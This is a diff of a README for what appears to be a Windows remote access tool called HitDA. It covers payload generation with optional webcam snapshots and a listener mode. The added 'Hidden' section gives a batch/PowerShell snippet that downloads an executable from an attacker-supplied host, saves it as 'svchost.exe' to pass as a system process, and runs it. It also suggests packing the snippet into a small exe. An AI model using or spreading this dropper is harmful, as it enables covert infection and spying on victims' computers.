HalukShan/HitDA/README.md

 || [9] Exit                                              ||
  =========================================================
 ```

-When you choose 0, you can choose the platform you want, and choose the script with webcam snap function
-or not, the webcam function will increase the script size to about
-**50MB**, otherwise, it's about **5MB**.
+### Hidden

-You can also use the **powershell**
+You can use the **powershell**
-script to automate download the script and execute, it will be more
+script to automate download the script and hide in some directorys, then execute
-anonymous and customizable.
-Like:
 ````
 mkdir C:\tmp
 cd C:\tmp
 powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://youripordomain/script.exe','svchost.exe');
 svchost.exe
 ````
-Save as .bat file, and use battoexe to generate a small exe file.
+Save as .bat file, and use **battoexe** to generate a small exe file.

 ### Listening
 Choose option 1 to start the listening mode, enter your listening host